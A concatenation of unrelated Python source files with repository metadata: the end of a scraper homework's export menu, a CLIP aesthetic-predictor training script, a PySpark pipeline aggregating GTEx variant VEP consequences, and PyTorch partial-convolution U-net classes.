print(f"Scraped data for {url}")
except FileNotFoundError:
print(f"Error: File '{file_path}' not found!")
elif choice == "3":
print("\n--- Export Options ---")
print("1. JSON")
print("2. TXT")
print("3. CSV")
print('4. Console')
export_choice = input("Enter your choice: ")
if export_choice == "1":
filename = input("Enter filename (without extension): ")
with open(f"{filename}.json", "w") as outfile:
outfile.write(json.dumps(all_data, indent=2, ensure_ascii=False))
print(f"Data saved to {filename}.json")
elif export_choice == "2":
filename = input("Enter filename (without extension): ")
with open(f"{filename}.txt", "w") as outfile:
outfile.write(json.dumps(all_data, indent=2, ensure_ascii=False))
print(f"Data saved to {filename}.txt")
elif export_choice == "3":
filename = input("Enter filename (without extension): ")
# Export to CSV: Save the scraped data into a CSV file.
export_to_csv(f"{filename}.csv", all_data)
print(f"Data saved to {filename}.csv")
elif export_choice == "4":
print(json.dumps(final_data, indent=2, ensure_ascii=False)) # Print the scraped data to console
else:
print("Invalid choice!")
elif choice == "4":
print("Exiting program. Goodbye!")
break
else:
print("Invalid choice! Please try again.")
if __name__ == '__main__':
main()
| CristianBrinza/UTM | year3/pr/lab2/homework.py | homework.py | py | 7,543 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "requests.RequestException",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "csv.Dic... |
22518135513 | import os
# os.environ['CUDA_VISIBLE_DEVICES'] = "0" # in case you are using a multi GPU workstation, choose your GPU here
import tqdm
import pytorch_lightning as pl
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import pandas as pd
from datasets import load_dataset
from torch.utils.data import TensorDataset, DataLoader
import numpy as np
#define your neural net here:
class MLP(pl.LightningModule):
def __init__(self, input_size, xcol='emb', ycol='avg_rating'):
super().__init__()
self.input_size = input_size
self.xcol = xcol
self.ycol = ycol
self.layers = nn.Sequential(
nn.Linear(self.input_size, 1024),
#nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(1024, 128),
#nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(128, 64),
#nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(64, 16),
#nn.ReLU(),
nn.Linear(16, 1)
)
def forward(self, x):
return self.layers(x)
def training_step(self, batch, batch_idx):
x = batch[self.xcol]
y = batch[self.ycol].reshape(-1, 1)
x_hat = self.layers(x)
loss = F.mse_loss(x_hat, y)
return loss
def validation_step(self, batch, batch_idx):
x = batch[self.xcol]
y = batch[self.ycol].reshape(-1, 1)
x_hat = self.layers(x)
loss = F.mse_loss(x_hat, y)
return loss
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)
return optimizer
# load the training data
x = np.load ("/mnt/spirit/ava_x.npy")
y = np.load ("/mnt/spirit/ava_y.npy")
val_percentage = 0.05 # 5% of the trainingdata will be used for validation
train_border = int(x.shape()[0] * (1 - val_percentage) )
train_tensor_x = torch.Tensor(x[:train_border]) # transform to torch tensor
train_tensor_y = torch.Tensor(y[:train_border])
train_dataset = TensorDataset(train_tensor_x,train_tensor_y) # create your datset
train_loader = DataLoader(train_dataset, batch_size=256, shuffle=True, num_workers=16) # create your dataloader
val_tensor_x = torch.Tensor(x[train_border:]) # transform to torch tensor
val_tensor_y = torch.Tensor(y[train_border:])
'''
print(train_tensor_x.size())
print(val_tensor_x.size())
print( val_tensor_x.dtype)
print( val_tensor_x[0].dtype)
'''
val_dataset = TensorDataset(val_tensor_x,val_tensor_y) # create your datset
val_loader = DataLoader(val_dataset, batch_size=512, num_workers=16) # create your dataloader
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = MLP(768).to(device) # CLIP embedding dim is 768 for CLIP ViT L 14
optimizer = torch.optim.Adam(model.parameters())
# choose the loss you want to optimze for
criterion = nn.MSELoss()
criterion2 = nn.L1Loss()
epochs = 50
model.train()
best_loss =999
save_name = "linear_predictor_L14_MSE.pth"
for epoch in range(epochs):
losses = []
losses2 = []
for batch_num, input_data in enumerate(train_loader):
optimizer.zero_grad()
x, y = input_data
x = x.to(device).float()
y = y.to(device)
output = model(x)
loss = criterion(output, y)
loss.backward()
losses.append(loss.item())
optimizer.step()
if batch_num % 1000 == 0:
print('\tEpoch %d | Batch %d | Loss %6.2f' % (epoch, batch_num, loss.item()))
#print(y)
print('Epoch %d | Loss %6.2f' % (epoch, sum(losses)/len(losses)))
losses = []
losses2 = []
for batch_num, input_data in enumerate(val_loader):
optimizer.zero_grad()
x, y = input_data
x = x.to(device).float()
y = y.to(device)
output = model(x)
loss = criterion(output, y)
lossMAE = criterion2(output, y)
#loss.backward()
losses.append(loss.item())
losses2.append(lossMAE.item())
#optimizer.step()
if batch_num % 1000 == 0:
print('\tValidation - Epoch %d | Batch %d | MSE Loss %6.2f' % (epoch, batch_num, loss.item()))
print('\tValidation - Epoch %d | Batch %d | MAE Loss %6.2f' % (epoch, batch_num, lossMAE.item()))
#print(y)
print('Validation - Epoch %d | MSE Loss %6.2f' % (epoch, sum(losses)/len(losses)))
print('Validation - Epoch %d | MAE Loss %6.2f' % (epoch, sum(losses2)/len(losses2)))
if sum(losses)/len(losses) < best_loss:
print("Best MAE Val loss so far. Saving model")
best_loss = sum(losses)/len(losses)
print( best_loss )
torch.save(model.state_dict(), save_name )
torch.save(model.state_dict(), save_name)
print( best_loss )
print("training done")
# inferece test with dummy samples from the val set, sanity check
print( "inferece test with dummy samples from the val set, sanity check")
model.eval()
output = model(x[:5].to(device))
print(output.size())
print(output)
| microsoft/LMOps | promptist/aesthetic/train_predictor.py | train_predictor.py | py | 5,077 | python | en | code | 2,623 | github-code | 1 | [
{
"api_name": "pytorch_lightning.LightningModule",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "t... |
40888591974 | # ---
# jupyter:
# jupytext:
# cell_metadata_json: true
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: Python [conda env:anaconda-spark30_prev2]
# language: python
# name: conda-env-anaconda-spark30_prev2-py
# ---
# +
import pyspark
from pyspark.sql import SparkSession
import pyspark.sql.functions as f
import pyspark.sql.types as t
import glow
import os
# -
import json
# +
MEM = os.popen("ulimit -m").read()
if MEM.startswith("unlimited"):
print("Memory not constrained, using all available memory...")
import psutil
MEM = psutil.virtual_memory().available / 1024
MEM = int(MEM)
N_CPU = int(os.popen("nproc").read())
print("memory: %dk" % MEM)
print("number of cores: %d" % N_CPU)
# -
MEM = int(MEM * 0.8)
#os.environ['PYSPARK_SUBMIT_ARGS'] = '--packages io.projectglow:glow_2.12:0.3.1-SNAPSHOT,io.delta:delta-core_2.11:0.5.0 --driver-memory %dk pyspark-shell' % MEM
os.environ['PYSPARK_SUBMIT_ARGS'] = " ".join([
# '--packages ' + ",".join([
# "io.projectglow:glow_2.12:0.3.1-SNAPSHOT",
# "io.delta:delta-core_2.12:0.5.1-SNAPSHOT",
# ]),
'--driver-memory %dk' % MEM,
'--jars ' + ",".join([
"/data/nasif12/home_if12/hoelzlwi/Projects/glow/core/target/scala-2.12/glow-assembly-0.3.1-SNAPSHOT.jar",
"/data/nasif12/home_if12/hoelzlwi/Projects/deltalake/target/scala-2.12/delta-core-assembly-0.5.1-SNAPSHOT.jar",
]),
'pyspark-shell'
])
os.environ['PYSPARK_SUBMIT_ARGS']
MAX_FAILURES=4
spark = (
SparkSession.builder
.appName('abc')
#.config("spark.local.dir", os.environ.get("TMP"))
.config("spark.local.dir", "/data/cephrbgssd/scratch/hoelzlwi")
.config("spark.master", f"local[{N_CPU},{MAX_FAILURES}]")
.config("spark.sql.shuffle.partitions", "2001")
.config("spark.sql.execution.arrow.enabled", "true")
#.config("spark.network.timeout", "1800s")
#.config("spark.executor.heartbeatInterval", "600s")
.config("spark.driver.maxResultSize", "48G")
# .config("spark.databricks.io.cache.enabled", "true") # only enable when local storage is actually on local SSD
.config("spark.task.maxFailures", MAX_FAILURES)
.getOrCreate()
)
glow.register(spark)
spark
spark.sparkContext.getConf().get("spark.local.dir")
spark.sparkContext.getConf().get("spark.task.maxFailures")
## define custom display Head to simplify looking at spark DataFrames.
def displayHead(df, nrows = 5):
return df.limit(nrows).toPandas()
# GTEX_PATH = '/s/project/variantDatabase/deltaLake/gtex_normalized'
GTEX_PATH = '/s/project/variantDatabase/gtex/v8/hg38/normalized.delta/'
GTEX_VEP_PATH = '/s/project/variantDatabase/gtex/v8/hg38/vep.delta/'
def zip_explode_cols(df: pyspark.sql.dataframe.DataFrame, cols: list, target_struct, target_colnames=None):
if target_colnames is None:
target_colnames = cols
df = df.withColumn(target_struct, f.explode(f.arrays_zip(*cols)))
df = df.withColumn(target_struct, f.struct(*[
f.col(target_struct + "." + actualName).alias(targetName)
for targetName, actualName in zip(target_colnames, df.schema[target_struct].dataType.fieldNames())
]))
return df
gtex_df = (
spark
.read
.format('parquet')
.load(GTEX_PATH)
.withColumn("num_alt_alleles", f.expr("genotype_states(genotypes)"))
.drop("names")
)
gtex_df.printSchema()
# + {"active": ""}
# # TODO: remove
# gtex_df = (
# gtex_df
# .withColumn("call_summary_stats", f.expr("call_summary_stats(genotypes)"))
# .withColumn("dp_summary_stats", f.expr("dp_summary_stats(genotypes)"))
# .withColumn("gq_summary_stats", f.expr("gq_summary_stats(genotypes)"))
# .drop("names")
# )
# +
# filter out low-quality variants
gtex_df = gtex_df.filter(f.array_contains(f.col("filters"), "PASS") & (f.col("qual") >= 99))
# convert one-sized arrays to scalars
gtex_df = (
gtex_df
.withColumnRenamed("alternateAlleles", "alternateAllele").withColumn("alternateAllele", f.expr("alternateAllele[0]"))
.withColumn("INFO_AC", f.expr("INFO_AC[0]"))
.withColumn("INFO_AF", f.expr("INFO_AF[0]"))
.withColumn("INFO_MLEAC", f.expr("INFO_MLEAC[0]"))
.withColumn("INFO_MLEAF", f.expr("INFO_MLEAF[0]"))
)
# count unique elements
gtex_df = (
gtex_df
.withColumn(
"zygocity",
f.struct(
f.expr('size(num_alt_alleles)').alias("n_samples"),
f.expr('size(filter(num_alt_alleles, x -> x == 2))').alias("n_homo"),
f.expr('size(filter(num_alt_alleles, x -> x == 1))').alias("n_hetero"),
f.expr('size(filter(num_alt_alleles, x -> x == 0))').alias("n_ref"),
f.expr('size(filter(num_alt_alleles, x -> x == -1))').alias("n_not_measured"),
f.expr('array_distinct(filter(num_alt_alleles, x -> not x in (-1, 0, 1, 2)))').alias("other")
)
)
# .withColumn("n_homozygous", f.expr('size(filter(num_alt_alleles, x -> x == 2))'))
# .withColumn("n_heterozygous", f.expr('size(filter(num_alt_alleles, x -> x == 1))'))
# .withColumn("n_ref", f.expr('size(filter(num_alt_alleles, x -> x == 0))'))
# .withColumn("n_not_measured", f.expr('size(filter(num_alt_alleles, x -> x == -1))'))
# .withColumn("n_not_measured", f.expr('size(filter(num_alt_alleles, x -> x == -1))'))
)
# -
gtex_df.printSchema()
x = displayHead(gtex_df)
x.T
alleleCounts = gtex_df.select("INFO_AC", f.expr("zygocity.*")).drop("other").toPandas()
alleleCounts
import plotnine as pn
pn.ggplot(alleleCounts, pn.aes(x="INFO_AC")) + pn.stat_ecdf() + pn.scale_x_log10() + pn.ylab("ECDF") + pn.ggtitle("ECDF of allele counts")
(
pn.ggplot(alleleCounts, pn.aes(x="n_homo"))
+ pn.stat_ecdf()
+ pn.scale_x_log10()
+ pn.xlab("Nr. of homozygous samples per variant")
+ pn.ylab("ECDF")
+ pn.ggtitle("ECDF of homozygous allele counts")
)
(
pn.ggplot(alleleCounts, pn.aes(x="n_hetero"))
+ pn.stat_ecdf()
+ pn.scale_x_log10()
+ pn.xlab("Nr. of heterozygous samples per variant")
+ pn.ylab("ECDF")
+ pn.ggtitle("ECDF of heterozygous allele counts")
)
gtex_singlegt = (
zip_explode_cols(
gtex_df,
cols=[
"genotypes",
"num_alt_alleles",
],
target_colnames=[
"gt",
"num_alt_alleles",
],
target_struct="genotype"
)
.drop(
"genotypes",
"num_alt_alleles",
)
)
gtex_singlegt.printSchema()
# +
# # filter for variants that have either an exclusive heterozygous or an exclusive homozygous sample
# gtex_singlegt = gtex_singlegt.filter(
# f"(genotype.num_alt_alleles == 1 AND zygocity.n_hetero == 1)"
# + f" OR {"incorrectly_encoded_metadata": "(genotype.num_alt_alleles == 2 AND zygocity.n_homo == 1)\""}
# )
# -
vep_df = (
spark
.read
.format('parquet')
.load(GTEX_VEP_PATH)
)
vep_df.printSchema()
displayHead(vep_df)
# +
IMPACT_LEVELS = ["HIGH", "MODERATE", "LOW", "MODIFIER"]
LOF_LEVELS = ["HC", "LC"]
csq_terms = {}
for csq_type in ['intergenic_consequences','motif_feature_consequences', 'regulatory_feature_consequences', 'transcript_consequences']:
unique_consequences = (
vep_df
.selectExpr(csq_type + ".consequence_terms as " + csq_type)
.withColumn(csq_type, f.explode(csq_type))
.withColumn(csq_type, f.explode(csq_type))
.drop_duplicates()
)
# unique_consequences.printSchema()
unique_consequences = unique_consequences.toPandas()
csq_terms[csq_type] = unique_consequences
# -
csq_terms
exploded_df = (
vep_df
.withColumn("transcript_consequence", f.expr("explode(transcript_consequences)")).drop("transcript_consequences")
.drop(
"colocated_variants",
"intergenic_consequences",
'most_severe_consequence',
'motif_feature_consequences',
'regulatory_feature_consequences',
)
)
exploded_df.printSchema()
transcript_consequences = exploded_df.select(
"*",
f.struct(*[
f.array_contains("transcript_consequence.consequence_terms", name).cast("byte").alias(name)
for name in csq_terms["transcript_consequences"].iloc[:,0].values
]).alias("consequences"),
f.struct(*[
(f.col("transcript_consequence.impact") == name).alias(name)
for name in IMPACT_LEVELS
]).alias("impact_level"),
f.struct(*[
(f.col("transcript_consequence.lof") == name).alias(name)
for name in LOF_LEVELS
]).alias("lof_level"),
)
transcript_consequences.printSchema()
# + {"active": ""}
# # unused
#
# def array_to_onehot_columns(df, input_col, output_col):
# from pyspark.ml.feature import CountVectorizer
#
# vectorizer = CountVectorizer(inputCol=input_col, outputCol=output_col, binary=True).fit(df)
# transformed_df = vectorizer.transform(df)
# vocabulary = vectorizer.vocabulary
#
# udf_to_array = f.udf(lambda v: v.toArray().tolist(), 'array<double>')
#
# transformed_df = (
# transformed_df
# .withColumn(output_col, udf_to_array(output_col)) \
# .withColumn(output_col, f.struct(*[
# f.col(output_col)[i].astype('boolean').alias(vocabulary[i]) for i in range(len(vocabulary))
# ]))
# )
#
# return transformed_df
# -
gtex_with_consequences = gtex_singlegt.withColumn("start", f.expr("start + 1")).join(
transcript_consequences.withColumnRenamed("seq_region_name", "contigName"),
["contigName", "start", "end"],
how="inner"
)
gtex_with_consequences.printSchema()
grouped_df = gtex_with_consequences.groupby(
"contigName",
"genotype.gt.sampleId",
"genotype.num_alt_alleles",
"transcript_consequence.gene_id"
)
# +
counts = grouped_df.agg(
f.struct(*[
# sum booleans as (0, 1) integer types
f.sum(
f.col("consequences." + c).cast("int")
).alias(c)
for c in transcript_consequences.schema["consequences"].dataType.fieldNames()
]).alias("consequences"),
f.struct(*[
# sum booleans as (0, 1) integer types
f.sum(
f.col("impact_level." + c).cast("int")
).alias(c)
for c in transcript_consequences.schema["impact_level"].dataType.fieldNames()
]).alias("impact_level"),
f.struct(*[
# sum booleans as (0, 1) integer types
f.sum(
f.col("lof_level." + c).cast("int")
).alias(c)
for c in transcript_consequences.schema["lof_level"].dataType.fieldNames()
]).alias("lof_level"),
f.struct(*[
f.min(f.col("transcript_consequence.sift_score")).alias("sift_min"),
f.mean(f.col("transcript_consequence.sift_score")).alias("sift_mean"),
f.max(f.col("transcript_consequence.sift_score")).alias("sift_max"),
f.min(f.col("transcript_consequence.polyphen_score")).alias("polyphen_min"),
f.mean(f.col("transcript_consequence.polyphen_score")).alias("polyphen_mean"),
f.max(f.col("transcript_consequence.polyphen_score")).alias("polyphen_max"),
f.min(f.col("transcript_consequence.cadd_raw")).alias("cadd_min"),
f.mean(f.col("transcript_consequence.cadd_raw")).alias("cadd_mean"),
f.max(f.col("transcript_consequence.cadd_raw")).alias("cadd_max"),
]).alias("scores"),
)
# -
counts.printSchema()
counts = counts.groupby("contigName", "gene_id", "sampleId").pivot("num_alt_alleles", [1, 2]).agg(
f.struct([
f.struct(*[
f.sum(f.col("consequences." + c)).alias(c)
for c in counts.schema["consequences"].dataType.fieldNames()
]).alias("consequences"),
f.struct(*[
f.sum(f.col("impact_level." + c)).alias(c)
for c in counts.schema["impact_level"].dataType.fieldNames()
]).alias("impact_level"),
f.struct(*[
f.sum(f.col("lof_level." + c)).alias(c)
for c in counts.schema["lof_level"].dataType.fieldNames()
]).alias("lof_level"),
f.struct(*[
f.sum(f.col("scores." + c)).alias(c)
for c in counts.schema["scores"].dataType.fieldNames()
]).alias("scores"),
])
)
counts = counts.withColumnRenamed("1", "heterozygous").withColumnRenamed("2", "homozygous")
counts.printSchema()
counts.write.format("delta").save('/s/project/rep/processed/VEP/vep_counts3.deltalake')
written_counts = (
spark
.read
.format('delta')
.load('/s/project/rep/processed/VEP/vep_counts3.deltalake')
)
displayHead(written_counts)
# +
from pyspark.sql import functions as F
from pyspark.sql.types import DataType, StructType, ArrayType
from pyspark.sql import DataFrame
import re
def __rename_nested_field__(in_field: DataType, fieldname_normaliser):
if isinstance(in_field, ArrayType):
dtype = ArrayType(__rename_nested_field__(in_field.elementType, fieldname_normaliser), in_field.containsNull)
elif isinstance(in_field, StructType):
dtype = StructType()
for field in in_field.fields:
dtype.add(fieldname_normaliser(field.name), __rename_nested_field__(field.dataType, fieldname_normaliser))
else:
dtype = in_field
return dtype
def __normalise_fieldname__(raw: str):
return re.sub('[^A-Za-z0-9_]+', '_', raw.strip())
def __get_fields_info__(dtype: DataType, name: str = ""):
ret = []
if isinstance(dtype, StructType):
for field in dtype.fields:
for child in __get_fields_info__(field.dataType, field.name):
wrapped_child = ["{prefix}{suffix}".format(
prefix=("" if name == "" else "`{}`.".format(name)), suffix=child[0])] + child[1:]
ret.append(wrapped_child)
elif isinstance(dtype, ArrayType) and (
isinstance(dtype.elementType, ArrayType) or isinstance(dtype.elementType, StructType)):
for child in __get_fields_info__(dtype.elementType):
wrapped_child = ["`{}`".format(name)] + child
ret.append(wrapped_child)
else:
return [["`{}`".format(name)]]
return ret
def normalise_fields_names(df: DataFrame, fieldname_normaliser=__normalise_fieldname__):
return df.select([
F.col("`{}`".format(field.name)).cast(__rename_nested_field__(field.dataType, fieldname_normaliser))
.alias(fieldname_normaliser(field.name)) for field in df.schema.fields
])
def flatten(df: DataFrame, fieldname_normaliser=__normalise_fieldname__):
cols = []
for child in __get_fields_info__(df.schema):
if len(child) > 2:
ex = "x.{}".format(child[-1])
for seg in child[-2:0:-1]:
if seg != '``':
ex = "transform(x.{outer}, x -> {inner})".format(outer=seg, inner=ex)
ex = "transform({outer}, x -> {inner})".format(outer=child[0], inner=ex)
else:
ex = ".".join(child)
cols.append(F.expr(ex).alias(fieldname_normaliser("_".join(child).replace('`', ''))))
return df.select(cols)
# -
flattened_counts = flatten(written_counts, lambda name: name)
flattened_counts.printSchema()
flattened_counts.write.format("delta").save('/s/project/rep/processed/VEP/vep_counts_flattened3.deltalake')
displayHead(flattened_counts)
| Hoeze/firefly | scripts/AggregateVEP.py | AggregateVEP.py | py | 15,105 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.popen",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "psutil.virtual_memory",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "os.popen",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number... |
20472215584 | import torch
from torch import nn
import torch.nn.functional as F
from typing import List, Callable, ClassVar
from collections import namedtuple
from copy import deepcopy
from .nvidia import PartialConv2d as PC2D
class PartiaLConv2d (nn.Conv2d):
def __init__(self, *args, **kwargs):
super(PartiaLConv2d, self).__init__(*args, **kwargs)
self.ones = torch.ones_like(self.weight)
self.n = self.ones.size(1) * self.ones.size(2) * self.ones.size(3)
self.mask = None
self.mask_for_input = None
self.mask_for_output = None
self.ratio = None
self.new_mask = None
def forward(self, input, mask=None):
assert input.dim() == 4
self.mask = mask
if self.mask is not None:
with torch.no_grad(): # try removing this
self.mask_for_input = self.mask.repeat(1, input.size(1), 1, 1) # same number of features as input
W = self.ones.to(input) # to move to same cuda device as input when necessary
self.mask_for_output = F.conv2d(self.mask_for_input, W, padding=self.padding, stride=self.stride)
self.ratio = self.n / (self.mask_for_output + 1e-8)
self.mask_for_output = self.mask_for_output.clamp(0, 1)
self.ratio = self.ratio * self.mask_for_output
# input = input * self.mask # THIS IS WHAT IS KILLING IT
output = super(PartiaLConv2d, self).forward(input)
bias_view = self.bias.view(1, self.out_channels, 1, 1)
output = ((output - bias_view) * self.ratio) + bias_view
output = output * self.mask_for_output
self.new_mask = self.mask_for_output.max(1, keepdim=True)[0] # why [0]?
else:
output = super().forward(input)
self.new_mask = None
assert output.dim() == 4
return output, self.new_mask
class PartialTransposeConv2d(nn.ConvTranspose2d):
def __init__(self, *args, **kwargs):
super(PartialTransposeConv2d, self).__init__(*args, **kwargs)
self.ones = torch.ones_like(self.weight)
self.n = self.ones.size(1) * self.ones.size(2) * self.ones.size(3)
self.mask = None
self.mask_for_input = None
self.mask_for_output = None
self.ratio = None
self.new_mask = None
def forward(self, input, mask=None):
assert input.dim() == 4
self.mask = mask
if self.mask is not None:
with torch.no_grad():
self.mask_for_input = self.mask.repeat(1, input.size(1), 1, 1) # same number of features as input
W = self.ones.to(input) # to move to same cuda device as input when necessary
self.mask_for_output = F.conv_transpose2d(self.mask_for_input, W, padding=self.padding, stride=self.stride)
self.ratio = self.n / (self.mask_for_output + 1e-8)
self.mask_for_output = self.mask_for_output.clamp(0, 1)
self.ratio = self.ratio * self.mask_for_output
# input = input * self.mask # in principle not necessary since first input masked and ouptput masked with new mask
output = super(PartialTransposeConv2d, self).forward(input)
bias_view = self.bias.view(1, self.out_channels, 1, 1)
# output = ((output - bias_view) * self.ratio) + bias_view
# output = output * self.mask_for_output
self.new_mask = self.mask_for_output.max(1, keepdim=True)[0]
else:
output = super().forward(input)
self.new_mask = None
assert output.dim() == 4
return output, self.new_mask
class Hyperparameters:
"""
The base class to hold model hyperparameters.
Params and Attributes:
in_channels (int): the number of input channels (or features).
hidden_channels (int): the number of channels of the hidden layers.
out_channels (int): the number of output channesl (or features)
dropout_rate (float): dropout rate during training
"""
def __init__(self, in_channels: int=None, hidden_channels: int=None, out_channels: int=None, dropout_rate: float=None):
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.dropout_rate = dropout_rate
def __str__(self):
return "; ".join([f"{a}={v}" for a, v in self.__dict__.items()])
class Container(nn.Module):
"""
Base class for 1D or 2D Container models. This class is not meant to be instantiated, only its subclasses.
It includes an adapter layer that adapts the input channels the desired number of hidden channels.
It includes a compression layer that adapts the hidden channels to the desired number of output channels.
Adapter and compression layers have a batch normalization of ReLU;
Params:
hp (Hyperparameters): the hyperparameters of the model.
model (ClassVar): the class of the internal model of the Container (Unet or CatStack, 1d or 2d versions).
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the adapter and compression layers.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d)
"""
def __init__(self, hp: Hyperparameters, model: ClassVar, conv: ClassVar, bn: ClassVar):
super().__init__()
self.hp = hp
self.out_channels = self.hp.out_channels
self.adaptor = conv(self.hp.in_channels, self.hp.hidden_channels, 1, 1)
self.BN_adapt = bn(self.hp.hidden_channels)
self.model = model(self.hp)
self.compress = conv(self.hp.hidden_channels, self.hp.out_channels, 1, 1)
self.BN_out = bn(self.hp.out_channels)
def forward(self, x):
x = self.adaptor(x)
x = self.BN_adapt(F.elu(x, inplace=True))
z = self.model(x)
z = self.compress(z)
z = self.BN_out(F.elu(z, inplace=True)) # need to try without to see if it messes up average gray level
return z
class Container1d(Container):
"""
1D Container model.
Params:
hp (Hyperparameters): the hyperparameters of the model.
model (ClassVar): the class of the internal model of the Container.
"""
def __init__(self, hp: Hyperparameters, model: ClassVar):
super().__init__(hp, model, nn.Conv1d, nn.BatchNorm1d)
class Container2d(Container):
"""
2D Container model.
Params:
hp (Hyperparameters): the hyperparameters of the model.
model (ClassVar): the class of the internal model of the Container.
"""
def __init__(self, hp: Hyperparameters, model: ClassVar):
super().__init__(hp, model, nn.Conv2d, nn.BatchNorm2d)
class Container2dPC(nn.Module):
"""
Params:
hp (Hyperparameters): the hyperparameters of the model.
"""
def __init__(self, hp: Hyperparameters):
super().__init__()
self.hp = hp
self.out_channels = self.hp.out_channels
self.adaptor = nn.Conv2d(self.hp.in_channels, self.hp.hidden_channels, 1, 1)
self.BN_adapt = nn.BatchNorm2d(self.hp.hidden_channels)
self.model = Unet2dPC(self.hp) # CatStack2dPC(self.hp) #
self.compress = nn.Conv2d(self.hp.hidden_channels, self.hp.out_channels, 1, 1)
self.BN_out = nn.BatchNorm2d(self.hp.out_channels)
def forward(self, x, mask=None):
x = self.adaptor(x)
x = self.BN_adapt(F.elu(x, inplace=True))
z = self.model(x, mask)
z = self.compress(z)
z = self.BN_out(F.elu(z, inplace=True)) # need to try without to see if it messes up average gray level
return z
class HyperparametersUnet(Hyperparameters):
"""
Hyperparameters for U-net models. Extends the base class Hyperparameters.
The number of layers (depth) of the U-net is simply specified by giving appropriate list of channels, kernels and stride.
Usage: a 3 layers U-net is specified with the following hyperparameters
HyperparametersUnet(
nf_table=[2,4,8, 16], # 1st layer: 2 -> 4 channels, 2nd layer: 4 -> 8 channels; 3rd layer: 8 -> 16 channels.
kernel_table=[3,3,3], # the three layers use same kernel 3
stride_table=[1,1,1], # the three layers use the same stride 1
pool=True, # pooling switched on
in_channels=2, # params from base class
hidden_channels=2, # params from base class
out_channels=3, # params from base class
dropout_rate=0.1 # params from base class
)
Params and Attributes:
nf_table (List[int]): the number of channels (features) of each layers in the form [in_channels, out/in_channels, in/out_channels, in/out_channels, ...]
kernel_table (List[int]): a list of the kernels for each layer.
stride_table (List[int]): a list of the strides for each layer.
pool (bool): indicate whether to include a pool/unpool step between layers.
"""
def __init__(self, nf_table: List[int], kernel_table: List[int], stride_table: List[int], pool:bool, **kwargs):
super().__init__(**kwargs)
self.hidden_channels = nf_table[0]
self.nf_table = nf_table
self.kernel_table = kernel_table
self.stride_table = stride_table
self.pool = pool
class Unet(nn.Module):
"""
Base class of 1D or 2D U-net models. This class is not meant to be instantiated.
The U-net is built recursively. The kernel, padding and number of features of each layer is provided as lists in the HyperparamterUnet object.
Params:
hp (HyperparameterUnet): the model hyperparameters.
model (ClassVar): the class of the internal model of the Container (Unet or CatStack, 1d or 2d versions).
conv (ClassVar): the class of the convolution (nn.Conv1d or nn.Conv2d) used for the descending branch of the U-net.
convT (ClassVar): the class of the transpose convolution (nn.ConvTranspose1d or nn.ConvTranspose2d) used for the ascending branch of the U-net.
bn (ClassVar): the class of the BatchNorm layer (nn.BatchNorm1d or nn.BatchNorm2d).
pool (ClassVar): the class of the pooling layer (F.AvgPool1d or F.AvgPool2d).
"""
def __init__(self, hp: HyperparametersUnet, conv: ClassVar, convT: ClassVar, bn: ClassVar, pool: Callable):
super().__init__()
self.hp = deepcopy(hp) # pop() will modify lists in place
self.nf_input = self.hp.nf_table[0]
self.nf_output = self.hp.nf_table[1]
self.hp.nf_table.pop(0)
self.kernel = self.hp.kernel_table.pop(0)
self.stride = self.hp.stride_table.pop(0)
self.dropout_rate = self.hp.dropout_rate
self.dropout = nn.Dropout(self.dropout_rate)
self.conv_down = conv(self.nf_input, self.nf_output, self.kernel, self.stride)
self.BN_down = bn(self.nf_output)
self.pool = pool
self.conv_up = convT(self.nf_output, self.nf_input, self.kernel, self.stride)
self.BN_up = bn(self.nf_input)
if len(self.hp.nf_table) > 1:
self.unet = self.__class__(self.hp)
else:
self.unet = None
# self.reduce = conv(self.nf_input + self.nf_output, self.nf_input, 3, 1, 1)
self.reduce = conv(2 * self.nf_input, self.nf_input, 3, 1, 1)
self.BN_out = bn(self.nf_input)
def forward(self, x):
y = self.dropout(x)
y = self.conv_down(y)
y = self.BN_down(F.relu(y, inplace=True)) # ReLU on down branch
if self.unet is not None:
if self.hp.pool:
y_size = y.size()
y = self.pool(y, 2, 2)
y = self.unet(y)
if self.hp.pool:
y = F.interpolate(y, y_size[-1])
y = self.dropout(y) # optional
y = self.conv_up(y)
y = self.BN_up(F.elu(y, inplace=True)) # Elu on up branch
# y = F.interpolate(y, x.size(-1), mode='nearest')
y = torch.cat((x, y), 1)
y = self.reduce(y)
y = self.BN_out(F.elu(y, inplace=True))
return y
class Unet2dPC(nn.Module):
"""
Base class of 1D or 2D U-net models. This class is not meant to be instantiated.
The U-net is built recursively. The kernel, padding and number of features of each layer is provided as lists in the HyperparamterUnet object.
Params:
hp (HyperparameterUnet): the model hyperparameters.
"""
def __init__(self, hp: HyperparametersUnet):
super().__init__()
self.hp = deepcopy(hp) # pop() will modify lists in place
self.nf_input = self.hp.nf_table[0]
self.nf_output = self.hp.nf_table[1]
self.hp.nf_table.pop(0)
self.kernel = self.hp.kernel_table.pop(0)
self.stride = self.hp.stride_table.pop(0)
self.dropout_rate = self.hp.dropout_rate
self.dropout = nn.Dropout(self.dropout_rate)
self.conv_down = PartiaLConv2d(self.nf_input, self.nf_output, self.kernel, self.stride)
self.BN_down = nn.BatchNorm2d(self.nf_output)
self.pool = F.max_pool2d
self.conv_up = PartialTransposeConv2d(self.nf_output, self.nf_input, self.kernel, self.stride)
